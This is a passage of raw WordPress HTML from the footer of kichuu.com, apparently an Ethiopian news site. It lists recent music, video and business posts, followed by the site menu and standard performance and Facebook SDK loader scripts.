						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-86239 post type-post status-publish format-standard has-post-thumbnail category-fun-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/gaafa-tokko-harreetu-waraabessaf-tola-olltefi-turte-kana-harreen/" title="Gaafa Tokko harreetu Waraabessaf Tola olltefi turte kana Harreen .."><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Harreen" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681.jpg 667w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Harreen" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681.jpg 667w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/gaafa-tokko-harreetu-waraabessaf-tola-olltefi-turte-kana-harreen/" title="Gaafa Tokko harreetu Waraabessaf Tola olltefi turte kana Harreen ..">
										Gaafa Tokko harreetu Waraabessaf Tola olltefi turte kana Harreen ..									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/01/">January 10, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-75646 post type-post status-publish format-standard has-post-thumbnail category-fun-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/isaias-isaiah-to-hit-america/" title="Isaias (Isaiah) to Hit America!"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Isaias" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-324x245.jpg 324w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Isaias" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-324x245.jpg 324w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/isaias-isaiah-to-hit-america/" title="Isaias (Isaiah) to Hit America!">
										Isaias (Isaiah) to Hit America!									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2020/08/">August 1, 2020</a></span>
</div>
							</div>
						</li>			</ul></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-3">
<div id="mh_magazine_custom_posts-13" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/musics/" class="mh-widget-title-link">Musics</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96583 post type-post status-publish format-standard has-post-thumbnail category-musics">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/dhugaan-kee-haa-mulaatu/" title="Dhugaan kee haa mula&#8217;atu"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dhugaan" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-e1624974222584.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dhugaan" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-e1624974222584.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap7-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/dhugaan-kee-haa-mulaatu/" title="Dhugaan kee haa mula&#8217;atu">
										Dhugaan kee haa mula&#8217;atu									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96451 post type-post status-publish format-standard has-post-thumbnail category-musics">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/bbc-finfinnee-keeysatti-siidaan-haacaaluu-inni-ni-dhaabbata-jedhamee-ture-maal-irra-gae/" title="BBC &#8220;Finfinnee keeysatti Siidaan Haacaaluu inni ni dhaabbata jedhamee ture maal irra ga&#8217;e?&#8221;"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Finfinnee" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-e1624822928810.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Finfinnee" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-e1624822928810.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap50-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/bbc-finfinnee-keeysatti-siidaan-haacaaluu-inni-ni-dhaabbata-jedhamee-ture-maal-irra-gae/" title="BBC &#8220;Finfinnee keeysatti Siidaan Haacaaluu inni ni dhaabbata jedhamee ture maal irra ga&#8217;e?&#8221;">
										BBC &#8220;Finfinnee keeysatti Siidaan Haacaaluu inni ni dhaabbata jedhamee ture maal irra ga&#8217;e?&#8221;									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 27, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-95803 post type-post status-publish format-standard has-post-thumbnail category-musics">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/%e1%89%a5%e1%88%94%e1%88%ad-%e1%88%88%e1%8b%ad%e1%89%b6-%e1%8a%a5%e1%8b%a8%e1%8c%88%e1%8b%b0%e1%88%89-%e1%89%a5%e1%88%94%e1%88%ad%e1%89%b0%e1%8a%9d%e1%8a%90%e1%89%b5-%e1%8b%ad%e1%8c%a5%e1%8d%8b/" title="ብሔር ለይቶ እየገደሉ #ብሔርተኝነት ይጥፋ ስሉ ግርም ይለኛል፡፡ ብሔርተኝነት ይለምልም፡፡"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="ብሔር" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-e1624122931571.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="ብሔር" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-e1624122931571.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/pizap-2021-06-19T131459.134-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/%e1%89%a5%e1%88%94%e1%88%ad-%e1%88%88%e1%8b%ad%e1%89%b6-%e1%8a%a5%e1%8b%a8%e1%8c%88%e1%8b%b0%e1%88%89-%e1%89%a5%e1%88%94%e1%88%ad%e1%89%b0%e1%8a%9d%e1%8a%90%e1%89%b5-%e1%8b%ad%e1%8c%a5%e1%8d%8b/" title="ብሔር ለይቶ እየገደሉ #ብሔርተኝነት ይጥፋ ስሉ ግርም ይለኛል፡፡ ብሔርተኝነት ይለምልም፡፡">
										ብሔር ለይቶ እየገደሉ #ብሔርተኝነት ይጥፋ ስሉ ግርም ይለኛል፡፡ ብሔርተኝነት ይለምልም፡፡									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 19, 2021</a></span>
</div>
							</div>
						</li>			</ul></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-4">
<div id="mh_magazine_custom_posts-14" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/business/" class="mh-widget-title-link">Business</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96503 post type-post status-publish format-standard has-post-thumbnail category-business">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/safaricom-to-retain-dividends-despite-ethiopia-cash-demands/" title="Safaricom to retain dividends despite Ethiopia cash demands"><picture class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image">
<source type="image/webp" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-80x60.jpg.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-678x509.jpg.webp 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-326x245.jpg.webp 326w" srcset="data:image/svg+xml,%3Csvg%20xmlns=&#039;http://www.w3.org/2000/svg&#039;%20viewBox=&#039;0%200%2080%2060&#039;%3E%3C/svg%3E" data-lazy-sizes="(max-width: 80px) 100vw, 80px"/>
<img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns=&#039;http://www.w3.org/2000/svg&#039;%20viewBox=&#039;0%200%2080%2060&#039;%3E%3C/svg%3E" alt="Safaricom" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-80x60.jpg"/>
</picture>
<noscript><picture class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image">
<source type="image/webp" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-80x60.jpg.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-678x509.jpg.webp 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-326x245.jpg.webp 326w" sizes="(max-width: 80px) 100vw, 80px"/>
<img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-80x60.jpg" alt="Safaricom" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/ndegwa-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px"/>
</picture>
</noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/safaricom-to-retain-dividends-despite-ethiopia-cash-demands/" title="Safaricom to retain dividends despite Ethiopia cash demands">
										Safaricom to retain dividends despite Ethiopia cash demands									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 28, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-96500 post type-post status-publish format-standard has-post-thumbnail category-business">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/beans-shortage-looms-as-ethiopia-imports-dry-up/" title="Beans shortage looms as Ethiopia imports dry up"><picture class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image">
<source type="image/webp" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-80x60.jpg.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-678x509.jpg.webp 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-326x245.jpg.webp 326w" srcset="data:image/svg+xml,%3Csvg%20xmlns=&#039;http://www.w3.org/2000/svg&#039;%20viewBox=&#039;0%200%2080%2060&#039;%3E%3C/svg%3E" data-lazy-sizes="(max-width: 80px) 100vw, 80px"/>
<img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns=&#039;http://www.w3.org/2000/svg&#039;%20viewBox=&#039;0%200%2080%2060&#039;%3E%3C/svg%3E" alt="Ethiopia" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-80x60.jpg"/>
</picture>
<noscript><picture class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image">
<source type="image/webp" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-80x60.jpg.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-678x509.jpg.webp 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-326x245.jpg.webp 326w" sizes="(max-width: 80px) 100vw, 80px"/>
<img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-80x60.jpg" alt="Ethiopia" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/beans-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px"/>
</picture>
</noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/beans-shortage-looms-as-ethiopia-imports-dry-up/" title="Beans shortage looms as Ethiopia imports dry up">
										Beans shortage looms as Ethiopia imports dry up									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 28, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-95871 post type-post status-publish format-standard has-post-thumbnail category-business">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/somalia-ethiopia-sign-agreement-on-fish-khat-trade-in-mogadishu/" title="Somalia, Ethiopia sign agreement on fish, khat trade in Mogadishu"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Somalia- Ethiopia" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/202684825_2639866306313294_5955850007181005332_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/202684825_2639866306313294_5955850007181005332_n-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/202684825_2639866306313294_5955850007181005332_n-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/202684825_2639866306313294_5955850007181005332_n-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Somalia- Ethiopia" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/202684825_2639866306313294_5955850007181005332_n-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/06/202684825_2639866306313294_5955850007181005332_n-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/somalia-ethiopia-sign-agreement-on-fish-khat-trade-in-mogadishu/" title="Somalia, Ethiopia sign agreement on fish, khat trade in Mogadishu">
										Somalia, Ethiopia sign agreement on fish, khat trade in Mogadishu									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 20, 2021</a></span>
</div>
							</div>
						</li>			</ul></div></div>
</div>
</footer>
	<div class="mh-footer-nav-mobile"></div>
	<nav class="mh-navigation mh-footer-nav" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
		<div class="mh-container mh-container-inner clearfix">
			<div class="menu-main_menu-container"><ul id="menu-main_menu-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-48174"><a href="https://kichuu.com/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-140"><a href="https://kichuu.com/category/news/">News</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-162"><a href="https://kichuu.com/category/news/africa/">Africa</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-163"><a href="https://kichuu.com/category/news/world/">World</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-18343"><a href="https://kichuu.com/category/afaan-oromoo/">Afaan Oromoo</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18358"><a href="https://kichuu.com/category/afaan-oromoo/news-afaan-oromoo/">News</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18359"><a href="https://kichuu.com/category/afaan-oromoo/radio/">Radio</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18360"><a href="https://kichuu.com/category/afaan-oromoo/tv/">TV</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18362"><a href="https://kichuu.com/category/afaan-oromoo/videos/">Videos</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18351"><a href="https://kichuu.com/category/amharic/">Amharic</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18"><a href="https://kichuu.com/category/women/">Women</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-231"><a href="https://kichuu.com/category/women/oromo/">Oromo</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-232"><a href="https://kichuu.com/category/women/other-women/">Other women</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17"><a href="https://kichuu.com/category/health/">Health</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-764"><a href="https://kichuu.com/category/musics/">Musics</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-350"><a href="https://kichuu.com/category/sports/">Sports</a></li>
</ul></div>		</div>
	</nav>
<div class="mh-copyright-wrap">
	<div class="mh-container mh-container-inner clearfix">
		<p class="mh-copyright">
			Copyright @2016 kichuu.com              		</p>
	</div>
</div>
<a href="#" class="mh-back-to-top"><i class="fa fa-chevron-up"></i></a>
</div><!-- .mh-container-outer -->
			<div id="fb-root"></div>
			<script data-rocketlazyloadscript='data:text/javascript;base64,CgkJCQkoZnVuY3Rpb24oZCwgcywgaWQpewoJCQkJCXZhciBqcywgZmpzID0gZC5nZXRFbGVtZW50c0J5VGFnTmFtZShzKVswXTsKCQkJCQlpZiAoZC5nZXRFbGVtZW50QnlJZChpZCkpIHJldHVybjsKCQkJCQlqcyA9IGQuY3JlYXRlRWxlbWVudChzKTsganMuaWQgPSBpZDsKCQkJCQlqcy5zcmMgPSAiaHR0cHM6Ly9yN2IzcDZxNy5yb2NrZXRjZG4ubWUvd3AtY29udGVudC9jYWNoZS9idXN0aW5nL2ZhY2Vib29rLXRyYWNraW5nL2Zic2RrLWVuX1VTLmpzI3hmYm1sPTEmdmVyc2lvbj12Mi45IjsKCQkJCQlmanMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoanMsIGZqcyk7CgkJCQl9KGRvY3VtZW50LCAnc2NyaXB0JywgJ2ZhY2Vib29rLWpzc2RrJykpOwoJCQk=' ></script> 		<div id="amp-mobile-version-switcher" hidden>
			<a rel="amphtml" href="https://kichuu.com/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira/amp/">
				Go to mobile version			</a>
		</div>

				<script type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4' id='wp-polyfill-js'></script>



<script type='text/javascript' id='rocket-browser-checker-js-after'>
"use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return 